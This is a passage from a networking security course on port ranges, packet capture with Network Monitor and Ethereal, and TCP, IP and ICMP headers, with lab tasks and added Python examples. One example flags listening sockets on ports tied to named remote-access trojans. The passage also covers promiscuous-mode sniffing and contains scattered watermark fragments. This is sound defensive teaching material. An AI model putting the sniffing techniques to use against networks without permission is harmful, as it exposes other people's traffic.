The well-known ports (also called reserved ports by some) are those in the range of 0 to 1023. These port numbers are assigned to specific applications and need to remain constant for the primary services of the Internet to continue to provide the flexibility and usefulness it does today. For example, the WWW service is port 80, the Telnet service is port 23, the SMTP service is port 25, and so on. The well-known port list is maintained by the Internet Assigned Numbers Authority (IANA), and can be found here: www.iana.org/assignments/port-numbers.

Registered ports are those in the range of 1024 to 49151. These port numbers can be registered to a specific function, but are not defined or controlled by a governing body, so multiple functions could end up using the same port. Dynamic ports (also called private ports) are those from 49152 to 65535. Any user of the Internet can use dynamic ports.

The following table lists some of the well-known ports and their associated services.

Some Well-known Ports and Their Services

Service                            Port
Telnet                             23
HTTP (Standard Web pages)          80
Secure HTTP (Secure Web pages)     443
FTP (Data and control)             20 and 21
DNS                                53
SMTP                               25
NNTP                               119

When a client connects to a server and requests a resource, that client also requires a port. The client ports (also called ephemeral ports by some) are used by a client during one specific connection; each subsequent connection will use a different port number. These ports are not assigned to any default service, and are usually a number greater than 1023. There is no defined range for client ports; they can cover the numbers of both the registered and dynamic port ranges. When a client begins a session by requesting a service from a server, such as the WWW service on port 80, the client uses an ephemeral port on the client side. This enables the server to respond to the client. Data is then exchanged between the two hosts using the port numbers established for that session: 80 on the server side, and a dynamic number greater than 1023 on the client side. The combination of the IP address and port is often referred to as a socket, and the two hosts together are using a socket pair to communicate for this session.

In addition to known valid services, such as those listed previously, there are many Trojan Horse programs that use specific ports (although the port can usually be changed).

Trojan Horse: An apparently useful and innocent program containing additional hidden code which allows the unauthorized collection, exploitation, falsification, or destruction of data.
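The port categories, socket pairs and the well-known services described above, applied to connection records, as an added example that is not part of the course material. It parses netstat-style lines (constructed here for a classroom host) and reports any listening socket whose port appears in the "Ports Associated with Trojan Horses" table in this section; the only port numbers and names it knows are those in that table and in the well-known ports table above.

```python
# Added example (not course code): classify ports into the three IANA
# categories described above and review netstat-style records for listeners
# on the ports that the Trojan Horse table in this section names.
# The netstat lines are constructed for illustration.

WELL_KNOWN = {20: "FTP data", 21: "FTP control", 23: "Telnet", 25: "SMTP",
              53: "DNS", 80: "HTTP", 119: "NNTP", 443: "Secure HTTP"}

# port -> (Trojan Horse name, protocol, or None where the table states none)
TROJAN_PORTS = {12345: ("NetBus", None), 1243: ("Sub Seven", None),
                27374: ("Sub Seven 2.1", None), 31337: ("Back Orifice", None),
                54320: ("Back Orifice 2000 (BO2K)", "TCP"),
                54321: ("Back Orifice 2000 (BO2K)", "UDP")}

def port_category(port):
    """IANA category of a 16-bit port number."""
    if not 0 <= port <= 65535:
        raise ValueError("port numbers are 16-bit values")
    if port <= 1023:
        return "well-known"
    if port <= 49151:
        return "registered"
    return "dynamic"

def parse_netstat_line(line):
    """Parse 'PROTO LOCAL:PORT REMOTE:PORT [STATE]', the layout of netstat -an."""
    fields = line.split()
    proto, local, remote = fields[0], fields[1], fields[2]
    state = fields[3] if len(fields) > 3 else ""
    local_ip, local_port = local.rsplit(":", 1)
    remote_ip, remote_port = remote.rsplit(":", 1)
    return {"proto": proto, "local_ip": local_ip, "local_port": int(local_port),
            "remote_ip": remote_ip,
            "remote_port": None if remote_port == "*" else int(remote_port),
            "state": state}

def socket_pair(rec):
    """The (IP, port) socket at each end of one connection."""
    return ((rec["local_ip"], rec["local_port"]),
            (rec["remote_ip"], rec["remote_port"]))

def review_listeners(lines):
    """Return (socket, Trojan Horse name) for each listening socket whose
    local port is in the table; a UDP socket is treated as listening."""
    findings = []
    for line in lines:
        rec = parse_netstat_line(line)
        listening = rec["state"] == "LISTENING" or rec["proto"] == "UDP"
        if not listening:
            continue
        hit = TROJAN_PORTS.get(rec["local_port"])
        if hit and hit[1] in (None, rec["proto"]):
            sock = f'{rec["proto"]} {rec["local_ip"]}:{rec["local_port"]}'
            findings.append((sock, hit[0]))
    return findings

SAMPLE_NETSTAT = [   # constructed records for a classroom host
    "TCP  172.16.10.5:80     0.0.0.0:0        LISTENING",
    "TCP  172.16.10.5:12345  0.0.0.0:0        LISTENING",
    "TCP  172.16.10.5:1043   172.16.10.9:80   ESTABLISHED",
    "UDP  172.16.10.5:53     *:*",
    "UDP  172.16.10.5:54321  *:*",
]

if __name__ == "__main__":
    for rec in map(parse_netstat_line, SAMPLE_NETSTAT):
        print(port_category(rec["local_port"]),
              WELL_KNOWN.get(rec["local_port"], "-"), socket_pair(rec))
    print(review_listeners(SAMPLE_NETSTAT))
```

The third sample line shows the socket pair the text describes: port 80 on the server side and an ephemeral port (1043, in the registered range) on the client side. Because the text notes that a Trojan Horse's port can usually be changed, a match on port number alone is a prompt to examine the process bound to the socket, not a verdict.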

Ports Associated with Trojan Horses

Port Number       Name of Trojan Horse
12345             NetBus
1243              Sub Seven
27374             Sub Seven 2.1
31337             Back Orifice
54320 (TCP)       Back Orifice 2000 (BO2K)
54321 (UDP)       Back Orifice 2000 (BO2K)

Network Monitor

There is a very valuable tool available with Windows called Network Monitor. This tool allows for full packet capture and lets the analyst (you) peer into the packets' contents, examining both the payload, or data, and the headers, in detail. You can see any set flags, the defined sequence and acknowledgement numbers, packet size, and more. The following is a discussion on the use of Network Monitor, provided as background for you to be able to perform the tasks in this lesson.

Some of the things you can do with Network Monitor are:
Analyze network traffic.
Filter specific protocols to capture.
Monitor real-time network traffic.

In this lesson, you will be focusing on the capture and analysis of IP packets, and on the details of the protocol suite.

In Figure 1-7, you can see the default view of Network Monitor. In this view, the screen is split into several sections.

Figure 1-7: The default view of Network Monitor, showing the various panes.

The top bar is the standard menu bar found in Microsoft programs. The basic functions on the toolbar that you will use in this lesson are contained in the File and Capture menus. The File menu contains three commands: Open, Save As, and Exit. Choose Open to open a previously saved Network Monitor capture. Choose Save As to save a Network Monitor capture. Choose Exit to exit.

The Capture menu has more commands: Start, Stop, Stop And View, Pause, and Continue. The Start, Pause, and Continue commands are self-explanatory. The difference between Stop and Stop And View is that the Stop command ends the capture. The Stop And View command ends the capture and switches Network Monitor to its next mode, Display View.

The other sections of the Capture View are panes (windows in a window) called Graph, Session Stats, Station Stats, and Total Stats. The Graph pane provides five bars that measure percentages of pre-defined metrics.

The top graph indicates the percentage (%) of network utilization, meaning how much the network is being used. The second graph indicates the number of frames per second, meaning frames transmitted per second over the network. The third graph indicates the number of bytes per second that are transmitted over the network. The fourth graph indicates the number of broadcasts per second that are transmitted over the network. The fifth graph indicates the number of multicasts per second that are transmitted over the network.

While a capture is running, these graphs work in realtime, providing current data.

The next pane is the Session Stats pane. In this pane, you can see the sessions that are taking place during the capture. Following the Session Stats is the Station Stats pane. In this pane, you can see statistics per interface on the host, per broadcast, per multicast, and more. The final pane in this view is the Total Stats pane. The Total Stats pane is subdivided into sections: Network Statistics, Captured Statistics, Per Second Statistics, Network Card (MAC) Statistics, and Network Card (MAC) Error Statistics. From this pane, you can identify frames, broadcasts, multicasts, network utilization, errors, and more, all in realtime during the capture.

Displaying Captures

After you have captured network traffic, you can begin your analysis, which requires a different view of Network Monitor. You will need to use the Display View. You can switch to the Display View by either using the Capture→Stop And View command or by using the Display Captured Data command after a capture session has been stopped.

Figure 1-8: The Summary View of Network Monitor.

When you first open the Summary View, as shown in Figure 1-8, you will see a timeline of packets captured. By double-clicking any packet that was captured, you can look into its details and bring up the next view of Network Monitor. Once you have selected a packet, Network Monitor displays three panes for presenting information to you.
Figure 1-9: The details of a packet in Network Monitor.

The top pane shown in Figure 1-9 is the Summary pane. This pane provides the basic details of a packet, such as:
Frame number
Time the packet was captured
Protocol used
Destination and source IP addresses
Destination and source MAC addresses

The middle pane shown in Figure 1-9 is the Detail pane. This pane provides the actual details of the protocol for the selected packet. Any line that has a plus sign next to it can be expanded for further detail. The bottom pane in Figure 1-9 is the Hex pane. This pane provides the actual Hex value for the raw data that each frame is comprised of. When you select something in the Detail pane, it is highlighted in the Hex pane for comparison. Also, in this pane, the ASCII characters are visible. In the event that cleartext is captured, this is where it will be readable.

Network Monitor Filters

Because Network Monitor has the ability to capture all network traffic, it would be very easy to capture too much information and have difficulty in finding what you were looking for. This is where filtering comes into play. There are two types of filters available in Network Monitor: capture filters and display filters. For example, if you wanted to capture only TCP messages, you could create a capture filter so that only TCP messages are captured. If you wanted to view only ICMP messages, you could create a display filter so that all you see are ICMP messages. Figure 1-10 and Figure 1-11 show the dialog boxes used for each filter type.

To create or use filters, choose Capture→Filter. Using filters not only makes it easier for you, as an analyst, to find what you are looking for, but they allow for the buffer that stores the capture to not be filled with useless information.

Figure 1-10: Network Monitor's Capture Filter dialog box.

Figure 1-11 shows the Display Filter dialog box.

Figure 1-11: Network Monitor's Display Filter dialog box.
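The Hex pane's side-by-side hex and ASCII presentation, and a display filter that applies the protocol and address selections described in this topic, as an added example that is not part of the course material and not Network Monitor's own code. The frame summaries are constructed from the classroom addresses; the reading of the direction arrows (---> for traffic from the given address, ---< for traffic to it, <--> for both) is an assumption made for this example.

```python
# Added example (not course code): a hex/ASCII dump in the style of Network
# Monitor's Hex pane, plus a display filter over constructed frame summaries
# with the protocol and address/direction options described in this topic.
# Direction mapping (---> from the address, ---< to it, <--> both) is assumed.

def hexdump(data, width=16):
    """Return 'offset  hex bytes  ASCII' lines; non-printable bytes show as '.',
    so any cleartext in a payload is readable in the right-hand column."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hex_part = " ".join(f"{b:02X}" for b in chunk).ljust(width * 3 - 1)
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08X}  {hex_part}  {text}")
    return lines

def display_filter(frames, protocol=None, address=None, direction="<-->"):
    """Keep frames matching a protocol (e.g. 'ICMP') and/or an address in the
    given direction. Either criterion may be omitted."""
    if direction not in ("--->", "---<", "<-->"):
        raise ValueError("direction must be --->, ---< or <-->")
    kept = []
    for frame in frames:
        if protocol and frame["protocol"] != protocol:
            continue
        if address:
            if direction == "--->" and frame["src"] != address:
                continue
            if direction == "---<" and frame["dst"] != address:
                continue
            if direction == "<-->" and address not in (frame["src"], frame["dst"]):
                continue
        kept.append(frame)
    return kept

FRAMES = [   # constructed Summary-pane records: number, protocol, source, destination
    {"frame": 1, "protocol": "ICMP", "src": "172.16.10.5", "dst": "172.16.0.1"},
    {"frame": 2, "protocol": "ICMP", "src": "172.16.0.1", "dst": "172.16.10.5"},
    {"frame": 3, "protocol": "TCP",  "src": "172.16.10.5", "dst": "172.16.10.9"},
    {"frame": 4, "protocol": "TCP",  "src": "172.16.10.9", "dst": "172.16.10.5"},
]

def frame_numbers(frames):
    return [f["frame"] for f in frames]

if __name__ == "__main__":
    for line in hexdump(b"GET / HTTP/1.0\r\nHost: www\r\n"):   # constructed payload
        print(line)
    print(frame_numbers(display_filter(FRAMES, protocol="ICMP")))        # Protocol == ICMP
    print(frame_numbers(display_filter(FRAMES, address="172.16.10.5", direction="--->")))
```

The first filter call reproduces the Protocol == ICMP expression built in Task 1B-1; the second keeps only frames the classroom host sent.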

When using filtering, you will likely use either protocol or address filtering. With protocol filtering, you identify a specific protocol to work with. With address filtering, you again define the specific address to filter. Filters can be implemented in different directions, either traffic into this host, outbound from this host, or in both directions. These options are implemented by selecting the appropriate arrow (one of these three: --->, ---<, or <-->) for the function you want to perform.

TASK 1B-1
Using Network Monitor

1. Open a command prompt, and enter ipconfig /all.

2. Record the MAC and IP addresses for the two network cards in your computer.
MAC address: Each card will have a unique MAC address.
IP address: Each card will have a unique IP address.
MAC address: Each card will have a unique MAC address.
IP address: Each card will have a unique IP address.
If you are on the LEFT side of the classroom, your IP addresses will be 172.16.10.x (for the network card connected to the classroom hub) and 172.26.10.x (for the network card connected to your partner's computer via a crossover cable). If you are on the RIGHT side of the classroom, your IP addresses will be 172.18.10.x (for the network card connected to the classroom hub) and 172.28.10.x (for the network card connected to your partner's computer via a crossover cable).

3. Close the Command Prompt window.

4. Open Network Monitor. (From the Start menu, choose Programs→Administrative Tools→Network Monitor.)
When you run Network Monitor the first time on a multi-homed computer, you might receive the following pop-up warning, or one similar to it.

5. If you see the Select Default Network message box, click OK to display the Select A Network dialog box. Expand the + sign next to Local Computer, select the interface with the MAC address associated with the Classroom Hub interface, and click OK.

6. Choose Capture→Start, or press the F10 key to start a capture.

7. If you are on the LEFT side of the classroom, ping the IP address 172.16.0.1. If you are on the RIGHT side of the classroom, ping the IP address 172.18.0.1. This will create network traffic for you to capture.

8. Wait for 30 to 40 seconds. As you wait, watch the realtime statistics change in the Network Monitor Capture window.

9. Choose Capture→Stop And View. You should now see the Display View, including the timeline of the packets captured.

10. Double-click any packet to change to the Detail View.

11. Observe the structure of the three panes in this view, and expand any + signs displayed in the middle pane.

12. Choose Display→Filter.

13. Select Protocol==Any, and click the Edit Expression button.

14. With the Protocol tab selected, click the Disable All button.

15. Scroll down to ICMP, select ICMP, and click the Enable button. The Expression field at the top of the dialog box should now display Protocol == ICMP. Click OK.

16. Click OK to implement this filter on your capture.

17. Observe that only ICMP frames are visible in your window now.

18. Choose File→Save As, and save the capture as First_Capture.cap, in the default location.

19. Close Network Monitor.

Ethereal

Another product that you can use to capture data is called Ethereal. With Ethereal, data can be captured off the wire or read from a captured file. Data can also be saved to a file in a format that Microsoft's Network Monitor can understand. The current version of Ethereal (0.9.11) can analyze over 300 Data Link, Network, Transport, and Application layer protocols.

promiscuous mode: Normally an Ethernet interface reads all address information and accepts follow-on packets only destined for itself, but when the interface is in promiscuous mode, it reads all information (sniffer), regardless of its destination.

To perform promiscuous mode captures on a Windows machine, you have to first download and install the latest version of WinPcap (at least WinPcap 2.3); do not install any alpha or beta versions. WinPcap is the Windows equivalent of libpcap (LIBrary for Packet CAPtures) for Linux. It can be obtained at http://winpcap.polito.it. In fact, you will use WinPcap later in the course, along with other tools such as windump, tcpdump, nmap, and snort. If you need to download Ethereal, be sure to get at least version 0.9.11. It can be obtained at www.ethereal.com.

TASK 1B-2
Installing and Starting Ethereal

1. Create a folder called Ethereal at the root of your Windows 2000 boot partition (for example, C:\).

2. Copy the files WinPcap_2_3.exe and ethereal-setup-0.9.11.exe to this folder.
Your instructor will tell you where to obtain these files.

3. Double-click WinPcap_2_3.exe, accept all defaults, including agreeing to the licensing agreement, and wait for the install to complete.

4. Double-click ethereal-setup-0.9.11.exe, agree to the licensing agreement, and leave all options set to the defaults, including the default installation folder. When the install is done, click Close.

5. Once it has been installed, to run Ethereal, double-click the icon for Ethereal on the desktop, or choose (from the Start menu) Programs→Ethereal→Ethereal.

Ethereal Overview

When you first start Ethereal, you will see a GUI with three panes. The top pane lists the captured frames in sequence. When you highlight a frame, the middle pane provides protocol layer information about that frame, and the bottom pane shows the details of the frame in both Hex and ASCII values.

Above the top frame there is a menu bar, with File, Edit, Capture, Display, and Tools menus towards the left side, and at the right corner there's a Help menu. Below the bottom frame, you will see four buttons: the Filter button, a dropdown bar, the Reset button, and the Apply button.

Figure 1-12: The Ethereal GUI.

When you want to start a capture, navigate to the menu at the top and choose Capture→Start. You can also start a capture with the Ctrl+K key combination. When you do so, you will see a dialog box asking you to specify the following:
The interface to capture from.
Whether you want to limit a capture to a particular size.
Whether you want to capture packets in promiscuous mode (you will need WinPcap to do so).
Any capture filters you want to apply.
The name of the file you want to save your captures to (you can do this later as well).
Whether you want to view the captures as they are being captured (via windump).
Parameters defining when the captures should be stopped.
Whether you want to enable or disable name resolution at the Data Link, Network, and Transport layers.

Ed or
DO NO T
Figure 1-14: Ethereal pop-up displaying capture information.

In

st

DU

When you click OK, capture will start on the selected network interface and you will see another pop-up informing you of that. Ethereal will continue with the capture until you click the Stop button.

ru ct

Figure 1-13: Ethereals Capture Options dialog box.

PL
Lesson 1: Advanced TCP/IP

IC

AT

E
31

iti

on

After you stop a capture, you can view it. Then, when you are done and want to save the capture for future reference:

1. Choose File→Save or File→Save As.

2. Provide the location of the folder where you want to save the file.

3. Click File Type and specify the output format.

4. Click OK to save the file.

Figure 1-15: The many Save As options in Ethereal.

Notice how many choices you have for saving a capture; you can save to Network Monitor's format if you want. (Conversely, Ethereal will read a capture saved by any of the protocol analyzers in the list.) When you are done with capture and analysis and want to close the program, choose File→Quit or press Ctrl+Q.

TASK 1B-3

Using Ethereal

Setup: Ethereal has been successfully installed and is running on your computer.

1. Choose Capture→Start to display the Capture Options dialog box.

2. Observe the list of network interfaces displayed in the Capture Options dialog box. The network interfaces are listed differently than in Network Monitor.

3. Select the network interface you want to perform the capture on. In this case, you would select the Classroom Hub interface.

To make sure you know which interface is the right one, start Regedit, and navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, which displays network interfaces with Hex values (the same way Ethereal lists them). Select an interface, and look for the string value IPAddress. Find the interface whose IP address is 172.16.10.x (if you are seated on the LEFT side of the class) or 172.18.10.x (if you are seated on the RIGHT side). Jot down the first few Hex characters (just enough to uniquely identify the interface), close Regedit, switch back to Ethereal, and select the network adapter whose Hex values match the characters you recorded.

4. Verify that you have selected Promiscuous mode capture.

5. Click OK.

If necessary, adjust the screen resolution so that you can access the OK button at the bottom of the Capture Options dialog box.

6. Ping your router's IP address.

7. Click Stop to stop and view the capture.

8. Double-click any frame where your computer is the source, the router is the destination, and the protocol is ICMP.

9. View the frame details.

10. Verify that you can relate to these captures in much the same way as your earlier Network Monitor captures.

11. Close Ethereal.

TCP Connections

Earlier, you were introduced to the function of and the process of control flags, the three-way handshake, and the session teardown. In this section, you are going to use Network Monitor to view the three-way handshake, packet by packet, and to view the teardown, packet by packet.

Remember, the three-way handshake is used by two hosts when they are creating a session. The first host begins by sending out a packet with the SYN flag set, and no other flags. The second packet is a response with both the SYN and ACK flags set. The third part of the session establishment will have the ACK flag set.

TASK 1B-4

Analyzing the Three-way Handshake

1. Open Network Monitor, and start a capture.

2. At a command prompt:

If you are on the RIGHT side of the classroom, enter telnet 172.18.0.1.

If you are on the LEFT side of the classroom, enter telnet 172.16.0.1.

3. When you are presented with a logon prompt for User Access Verification, press Enter repeatedly until your screen resembles the following graphic. Minimize the Command Prompt window.

4. Switch back to Network Monitor, and choose Capture→Stop And View.

5. In the Summary pane, identify the frames that are involved in the three-way handshake.

6. Once you have identified the frames that are part of the three-way handshake, based on the discussion, look for the following:
a. In the first frame, what are the SEQ number, ACK number, and flags?
b. In the second frame, what are the SEQ number, ACK number, and flags?
c. In the third frame, what are the SEQ number, ACK number, and flags?

7. Expand each of the three frames in the handshake, and examine them in greater detail in the Detail pane.

8. Using the Hex pane, identify the value for the flags that are set for each frame.

9. Leave Network Monitor open, along with this capture, for the next task.

The Session Teardown Process

Previously, you examined the session teardown process. Here, you will examine the details of the session teardown. Remember, there are four parts of session teardown.

TASK 1B-5

Analyzing the Session Teardown Process

Setup: Network Monitor is running, and the last capture you performed is displayed.

1. In the Summary pane, identify the frames that are involved in the session teardown.

2. Once you have identified the frames, examine them in greater detail in the Detail pane.

3. In each frame, identify at least the following:
a. Flags that are set.
b. Sequence number.
c. Acknowledgement number.

4. Save the capture as tcp_connections.cap and close the capture.

5. Minimize Network Monitor.

Topic 1C

Capturing and Identifying IP Datagrams

Along with TCP, the protocol you will spend the most time analyzing will be IP. This protocol is the one that does the most work of the entire TCP/IP suite. In Figure 1-16, you can see the actual format of the IP datagram. There are seven rows of information in the figure, with the critical rows being the first five. When a computer receives an IP datagram, it will begin reading on Row One on the left side, bit by bit. Once it reads through Row One, it will read Row Two, and so on.

To work with IP further, refer to RFC 791.

IP Datagram, with All Fields Shown

Figure 1-16: An IP datagram with all fields shown.

Using Figure 1-16, we will move through the header, identifying the function of each area. After identifying the header fields, we will use Network Monitor to capture and analyze the IP header. Starting on Row One, on the left side is a field called Version. This is a 4-bit field that defines the version of IP that is currently running. Right now, this will likely be a value of 4, as that is the current industry standard: IPv4, or IP version 4. Some instances may be using IP version 6, or IPv6, which you will examine later in the course.

Moving to the right of the Version is a field called Header Length (IHL). This is a 4-bit field that defines the number of 32-bit words in the header itself, including options. In most captures, this value will be 5, the normal value when no options are set.

Continuing to the right of Header Length is a field called Type Of Service. This is an 8-bit field that defines the quality of service for this packet. Different applications may have different needs for available bandwidth, and type of service is one way of addressing those needs.

The last field on Row One is the field called Total Length. This is a 16-bit field that defines the length of the entire IP datagram in bytes.

Starting on Row Two, on the left side is a field called Identification. This is a 16-bit field that identifies each datagram sent by the host. The standard for this field is for the identification value to increment by one for every datagram sent. Following the Identification field is a field called Flags. Not to be confused with the flags of TCP, which you have seen, this is a 3-bit field that is used in conjunction with fragmentation. The first of the three bits is to be set at 0, as a default. The next bit is known as the DF bit, or Don't Fragment. The third bit is known as the MF bit, or More Fragments. The last field on Row Two is a field called Fragment Offset. This is a 13-bit field that is used to define where in the datagram this fragment belongs. (If there is fragmentation, the first fragment will have an offset of 0.)

Starting on Row Three, on the left side, is a field called Time To Live. This is an 8-bit field that is used to define the maximum amount of time this datagram may be allowed to exist in the network. The TTL is created by the sender and lowers by 1 for every router that the datagram crosses. If the TTL reaches 0, the packet is to be discarded.

Moving to the right is a field called Protocol. This is an 8-bit field that is used to define the upper-layer protocol that is in use for this datagram. There are many unique protocol numbers, and if you wish to study all of the numbers, please refer to RFC 790. However, the following list identifies several important Protocol ID numbers:

• Protocol ID Number 1: ICMP
• Protocol ID Number 6: TCP
• Protocol ID Number 17: UDP

The final field on Row Three is a field called Header Checksum. This is a 16-bit field that is used to provide a check on the IP header only; this is not a checksum for any data following the header. This checksum provides integrity for the header itself.

integrity: Assuring information will not be accidentally or maliciously altered or destroyed.

The Fourth Row is a single field, the Source IP Address. This field is a 32-bit value that identifies the IP address of the source host of this packet.

The Fifth Row is also a single field, the Destination IP Address. This field is a 32-bit value that identifies the IP address of the destination host for this packet.

The Sixth Row contains any options that may be present. This is a variable field, with no absolute fixed size to the options. Some of the options that may be in this field are those that are related to routing or timekeeping. If options are used, there will be padding added so this field equals 32 bits in size.

The Seventh and final Row is the representation of the data. By this point, the header is complete and the data the user wishes to send or receive is stored in the packet.

TASK 1C-1

Capturing and Identifying IP Datagrams

Setup: You are logged on to Windows 2000 as Administrator. A command prompt and Network Monitor are running.

1. If necessary, enable the FTP service.

2. In Network Monitor, start a capture, and leave this running.

3. At the command prompt, enter ftp ip_address, where ip_address is the address of a neighboring computer.

4. Log on as Anonymous.

5. After you are logged on, enter quit to end the FTP session.

6. Back in Network Monitor, choose Capture→Stop And View to view the captured frames.

7. Observe the Protocol column. We are interested only in the TCP and FTP frames. Apply a filter to show only TCP and FTP, and then double-click any FTP frame. For the specific steps to add filters, see Task 1B-1, step 12 through step 16.

8. Examine the IP header, compared to the discussion. Look for the following:
a. Version Number
b. Time To Live
c. Protocol ID
d. Source Address
e. Destination Address

9. Once you are done examining the IP header, save the capture as IP_Header.cap and close the capture.

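The IP header walk-through above, and the fields Task 1C-1 asks you to locate, as an added Python example that is not part of the course material: a parser that reads the five fixed rows, decodes the DF/MF flags and verifies the header checksum, applied to a header it constructs itself. The addresses, Identification value and TTL are assumptions, not values from any classroom capture.

```python
import struct
from dataclasses import dataclass

# Protocol ID numbers named in the text (RFC 790 lists the rest)
IP_PROTOCOLS = {1: "ICMP", 6: "TCP", 17: "UDP"}
IP_HEADER_FMT = "!BBHHHBBH4s4s"   # the five fixed rows: 20 bytes


def internet_checksum(data: bytes) -> int:
    """One's-complement sum of 16-bit words (RFC 791); an odd trailing byte is zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


@dataclass
class IPHeader:
    version: int
    ihl: int               # header length in 32-bit words; 5 means no options
    tos: int
    total_length: int      # whole datagram, header plus data, in bytes
    identification: int
    df: bool               # Don't Fragment
    mf: bool               # More Fragments
    fragment_offset: int   # in 8-byte units; 0 for the first (or only) fragment
    ttl: int
    protocol: int
    checksum_ok: bool
    src: str
    dst: str
    options: bytes


def parse_ip_header(datagram: bytes) -> IPHeader:
    """Read the header row by row, as the text describes, and verify the header checksum."""
    if len(datagram) < 20:
        raise ValueError("datagram is shorter than the 20-byte minimum IP header")
    (ver_ihl, tos, total_length, ident, flags_frag,
     ttl, proto, _csum, src, dst) = struct.unpack(IP_HEADER_FMT, datagram[:20])
    version, ihl = ver_ihl >> 4, ver_ihl & 0x0F          # Row One, first two 4-bit fields
    if version != 4:
        raise ValueError(f"not an IPv4 header (version {version})")
    header_len = ihl * 4
    if ihl < 5 or header_len > len(datagram):
        raise ValueError(f"IHL {ihl} claims a {header_len}-byte header")
    if flags_frag & 0x8000:                               # first flag bit must be 0
        raise ValueError("reserved flag bit is set")
    return IPHeader(
        version=version, ihl=ihl, tos=tos, total_length=total_length,
        identification=ident,
        df=bool(flags_frag & 0x4000), mf=bool(flags_frag & 0x2000),
        fragment_offset=flags_frag & 0x1FFF,
        ttl=ttl, protocol=proto,
        # The checksum covers the header only (options included), never the data;
        # a header whose words, checksum included, sum to all ones verifies to 0.
        checksum_ok=internet_checksum(datagram[:header_len]) == 0,
        src=".".join(map(str, src)), dst=".".join(map(str, dst)),
        options=datagram[20:header_len],
    )


def build_ip_header(src: str, dst: str, protocol: int, payload_len: int,
                    ident: int = 1, ttl: int = 128, df: bool = True) -> bytes:
    """Construct a 20-byte header with a correct checksum (sample data, not from any capture)."""
    fields = [0x45, 0, 20 + payload_len, ident, 0x4000 if df else 0, ttl, protocol, 0,
              bytes(map(int, src.split("."))), bytes(map(int, dst.split(".")))]
    fields[7] = internet_checksum(struct.pack(IP_HEADER_FMT, *fields))  # computed with the field zeroed
    return struct.pack(IP_HEADER_FMT, *fields)


if __name__ == "__main__":
    # Constructed sample: a 40-byte TCP segment from a classroom host to its router
    hdr = build_ip_header("172.16.10.5", "172.16.0.1", 6, 40, ident=0x1234)
    parsed = parse_ip_header(hdr)
    print(parsed, "->", IP_PROTOCOLS.get(parsed.protocol, "other"))
```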
Topic 1D

Capturing and Identifying ICMP Messages

When you are analyzing protocols, it should become immediately apparent that there are differences between ICMP and the other protocols discussed in this lesson. There is a similar concept in that the ICMP message is encapsulated in the IP datagram, just as you saw with TCP and UDP. In Figure 1-17, you can see the actual format of the ICMP message. There are only two rows of information shown in the figure.

To work with ICMP further, refer to RFC 792.

ICMP Message, with All Fields Shown

Figure 1-17: An ICMP message with all fields shown.

Using Figure 1-17, we will move through the header, identifying the function of each area. After identifying the header fields, we will use Network Monitor to capture and analyze an ICMP message. Starting on Row One, on the left side, the first field is called Type. This is an 8-bit value that identifies the specific ICMP message. For example, a Type could be 3, which is a type of unreachable message.

Following Type on Row One is a field called Code. This is an 8-bit value that works in conjunction with Type to define the specific details of the ICMP message. For example, using Type 3, the Code could be 1, which is destination host unreachable. Moving along on Row One, the final field is called Checksum. This is a 16-bit value that checks the integrity of the entire ICMP message.

The Second Row has no fixed fields. Depending on the Type and Code of the ICMP message, this field may contain many things. One example of what may go in this field is timestamping of messages.

TASK 1D-1

Capturing and Identifying ICMP Messages

Setup: You are logged on to Windows 2000 as Administrator. A command prompt and Network Monitor are running.

1. Begin a new capture.

2. Switch to the command prompt, and ping a valid IP address of another host in your subnet. Wait for the ping to finish, and then minimize the command prompt.

3. In Network Monitor, stop and view the capture.

4. Scroll down the packets captured to identify ICMP messages, or create an ICMP filter.

5. Analyze the captured frames to identify the ping process between your computer and the host you pinged.

6. Compare the messages to the discussion, looking for the following:
a. Source IP Address
b. Destination IP Address
c. Type
d. Code
e. Payload for ping

7. Save this capture as Valid_Ping.cap and close it.

8. You are going to run another capture. Begin a new capture.
9. Switch to the command prompt, ping a known invalid IP address for your network, wait for the ping to finish, and minimize the command prompt. For instance, if you were to ping the address 208.18.24.2, you should receive a message indicating that the request timed out. Or, if you are on the 172.16.10.0 network, you might try to ping the address 172.16.10.201, as that address is unlikely to be in use on your network.

10. In Network Monitor, stop and view the capture.

11. Scroll down the packets captured to identify ICMP messages.

12. Analyze the captured frames, and compare them to the discussion, looking for the following:
a. Source IP Address
b. Destination IP Address
c. Type
d. Code

13. Save this capture as icmpheader.cap, and close the capture.

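The Type, Code and Checksum fields above, and the request/reply pairing Task 1D-1 asks you to find in a ping capture, as an added Python example that is not part of the course material: a decoder for echo and destination-unreachable messages that verifies the checksum over the whole message and matches a reply to its request on identifier, sequence number and payload. The identifier, sequence numbers and payload are constructed (the payload is modelled on the 32 bytes Windows ping sends).

```python
import struct

ICMP_TYPES = {0: "Echo Reply", 3: "Destination Unreachable", 8: "Echo Request",
              11: "Time Exceeded", 13: "Timestamp", 14: "Timestamp Reply"}
UNREACHABLE_CODES = {0: "net unreachable", 1: "host unreachable",
                     2: "protocol unreachable", 3: "port unreachable"}


def internet_checksum(data: bytes) -> int:
    """One's-complement sum of 16-bit words, odd tail zero-padded (same rule as the IP header)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _with_checksum(body: bytes) -> bytes:
    """Fill the Checksum field (bytes 2-3); it covers the entire ICMP message."""
    return body[:2] + struct.pack("!H", internet_checksum(body)) + body[4:]


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Type 8 (request) or 0 (reply): Row Two holds a 16-bit identifier and sequence number."""
    if icmp_type not in (0, 8):
        raise ValueError("echo messages are type 8 or type 0")
    return _with_checksum(struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload)


def build_unreachable(code: int, offending_datagram: bytes) -> bytes:
    """Type 3: Row Two is 4 unused bytes, then the offending IP header plus its first 8 data bytes."""
    return _with_checksum(struct.pack("!BBHI", 3, code, 0, 0) + offending_datagram[:28])


def parse_icmp(message: bytes) -> dict:
    """Decode Type, Code and Checksum, then interpret Row Two according to the Type."""
    if len(message) < 8:
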